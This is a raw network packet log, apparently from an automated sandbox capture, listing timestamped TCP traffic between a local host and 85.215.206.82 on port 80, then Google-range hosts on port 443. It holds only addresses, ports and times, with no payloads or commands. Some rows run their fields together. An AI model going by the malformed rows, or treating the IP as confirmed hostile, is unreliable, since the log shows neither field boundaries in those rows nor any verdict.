                                                                                                                                                                        Oct 23, 2024 17:26:45.985524893 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.078674078 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.078692913 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.078706980 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.078727961 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.078742981 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.079020023 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.079030991 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.079045057 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.079057932 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.079082012 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.079091072 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.079102039 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.079125881 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.100327015 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.100341082 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.100353003 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.100395918 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.100410938 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.101248026 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.101259947 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.101269960 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.101291895 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.101306915 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.143363953 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.143377066 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.143389940 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.143438101 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.143470049 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.195436001 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.195555925 CEST4917080192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:26:46.195564985 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.195575953 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.195589066 CEST804917085.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:46.195601940 CEST804917085.215.206.82192.168.2.22
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 23, 2024 17:26:46.195616007 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.195641041 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.195641041 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.195641041 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.195656061 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.195656061 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.196235895 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.196247101 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.196309090 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.216944933 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.216959000 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.216970921 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.217015028 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.217015028 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.217047930 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.217086077 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.217328072 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.217346907 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.217390060 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.217403889 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.218055010 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.218065023 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.218101025 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.260370970 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.260487080 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.260585070 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.260651112 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.312869072 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.312882900 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.312894106 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.313026905 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.313791037 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.313802004 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.313851118 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.334038019 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.334050894 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.334062099 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.334141970 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.334393978 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.334405899 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.334417105 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.334443092 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.334460974 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.334849119 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.334860086 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.334894896 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.335067987 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.335078001 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.335095882 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.335105896 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.335112095 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.335130930 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.427258968 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.427284002 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.427366972 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.430124998 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.430138111 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.430150032 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.430196047 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.430212975 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.430531979 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.430591106 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.450958014 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.450969934 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.450980902 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.451013088 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.451015949 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.451025963 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.451030016 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.451042891 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.451045990 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.451056957 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.451070070 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.451078892 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.451095104 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.452042103 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.452078104 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.452089071 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.452095985 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.452107906 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.452114105 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.452120066 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.452132940 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.452133894 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.452146053 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.452164888 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.547053099 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.547077894 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.547159910 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.547168970 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.547173977 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.547199011 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.547216892 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.547256947 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.547293901 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.567960024 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.568016052 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.568042994 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.568056107 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.568106890 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.568193913 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.568247080 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:46.568253994 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:46.568293095 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:50.739285946 CEST  80           49170      85.215.206.82    192.168.2.22
Oct 23, 2024 17:26:50.739401102 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:52.068851948 CEST  49171        443        192.168.2.22     142.250.181.238
Oct 23, 2024 17:26:52.068922043 CEST  443          49171      142.250.181.238  192.168.2.22
Oct 23, 2024 17:26:52.068977118 CEST  49171        443        192.168.2.22     142.250.181.238
Oct 23, 2024 17:26:52.074064970 CEST  49171        443        192.168.2.22     142.250.181.238
Oct 23, 2024 17:26:52.074090004 CEST  443          49171      142.250.181.238  192.168.2.22
Oct 23, 2024 17:26:52.932347059 CEST  443          49171      142.250.181.238  192.168.2.22
Oct 23, 2024 17:26:52.932420969 CEST  49171        443        192.168.2.22     142.250.181.238
Oct 23, 2024 17:26:52.933160067 CEST  443          49171      142.250.181.238  192.168.2.22
Oct 23, 2024 17:26:52.933218956 CEST  49171        443        192.168.2.22     142.250.181.238
Oct 23, 2024 17:26:52.948512077 CEST  49171        443        192.168.2.22     142.250.181.238
Oct 23, 2024 17:26:52.948538065 CEST  443          49171      142.250.181.238  192.168.2.22
Oct 23, 2024 17:26:52.948940039 CEST  443          49171      142.250.181.238  192.168.2.22
Oct 23, 2024 17:26:53.155344963 CEST  443          49171      142.250.181.238  192.168.2.22
Oct 23, 2024 17:26:53.155483007 CEST  49171        443        192.168.2.22     142.250.181.238
Oct 23, 2024 17:26:53.192960024 CEST  49171        443        192.168.2.22     142.250.181.238
Oct 23, 2024 17:26:53.235336065 CEST  443          49171      142.250.181.238  192.168.2.22
Oct 23, 2024 17:26:53.553282022 CEST  443          49171      142.250.181.238  192.168.2.22
Oct 23, 2024 17:26:53.673547029 CEST  443          49171      142.250.181.238  192.168.2.22
Oct 23, 2024 17:26:53.674081087 CEST  49171        443        192.168.2.22     142.250.181.238
Oct 23, 2024 17:26:53.676384926 CEST  49171        443        192.168.2.22     142.250.181.238
Oct 23, 2024 17:26:53.687864065 CEST  49172        443        192.168.2.22     216.58.212.129
Oct 23, 2024 17:26:53.687897921 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:53.687954903 CEST  49172        443        192.168.2.22     216.58.212.129
Oct 23, 2024 17:26:53.688375950 CEST  49172        443        192.168.2.22     216.58.212.129
Oct 23, 2024 17:26:53.688389063 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:54.138770103 CEST  49170        80         192.168.2.22     85.215.206.82
Oct 23, 2024 17:26:54.559938908 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:54.560015917 CEST  49172        443        192.168.2.22     216.58.212.129
Oct 23, 2024 17:26:54.566313982 CEST  49172        443        192.168.2.22     216.58.212.129
Oct 23, 2024 17:26:54.566329956 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:54.566690922 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:54.570039034 CEST  49172        443        192.168.2.22     216.58.212.129
Oct 23, 2024 17:26:54.611329079 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:56.975172043 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:56.975243092 CEST  49172        443        192.168.2.22     216.58.212.129
Oct 23, 2024 17:26:56.983258963 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:56.983387947 CEST  49172        443        192.168.2.22     216.58.212.129
Oct 23, 2024 17:26:57.091111898 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:57.091242075 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:57.091401100 CEST  49172        443        192.168.2.22     216.58.212.129
Oct 23, 2024 17:26:57.091414928 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:57.091653109 CEST  49172        443        192.168.2.22     216.58.212.129
Oct 23, 2024 17:26:57.093940020 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:57.099776983 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:57.099814892 CEST  443          49172      216.58.212.129   192.168.2.22
Oct 23, 2024 17:26:57.099890947 CEST  49172        443        192.168.2.22     216.58.212.129
Oct 23, 2024 17:26:57.099905968 CEST  443          49172      216.58.212.129   192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.108622074 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.108808041 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.108818054 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.208235979 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.208281040 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.208324909 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.208348036 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.208357096 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.208394051 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.208398104 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.208442926 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.211005926 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.216706991 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.216816902 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.216816902 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.216829062 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.216898918 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.225980043 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.226295948 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.226360083 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.226375103 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.325342894 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.325387001 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.325449944 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.325489998 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.325503111 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.325567007 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.328099012 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.334115982 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.334213972 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.334225893 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.343436003 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.343496084 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.343497038 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.343511105 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.343550920 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.343563080 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.442471027 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.442516088 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.442643881 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.442658901 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.442728996 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.445302010 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.446317911 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.446372032 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.446377039 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.446391106 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.446427107 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.451740026 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.460659981 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.460705042 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.460735083 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.460736990 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.460747004 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.460793018 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.559564114 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.559608936 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.559619904 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.559633017 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.559679031 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.562264919 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.569041967 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.569067001 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.569109917 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.569118977 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.569154024 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.569295883 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.578555107 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.578583956 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.578648090 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.578656912 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.578691959 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.578758955 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.580769062 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.580776930 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.676546097 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.676584005 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.676670074 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.676693916 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.680484056 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.680588961 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.680598974 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.686234951 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.686320066 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.686331034 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.695729971 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.695781946 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.695810080 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.695820093 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.695867062 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.695883036 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.695888996 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.695929050 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.696280956 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.794672012 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.794751883 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.794775963 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.794792891 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.794833899 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.797738075 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.803217888 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.803286076 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.803297043 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.803307056 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.803344011 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.812864065 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.812927961 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.812963009 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.812983990 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.812998056 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.813126087 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.813256025 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.813262939 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.813303947 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:57.813899994 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:57.911536932 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.622037888 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.622046947 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.622926950 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.622983932 CEST49172443192.168.2.22216.58.212.129
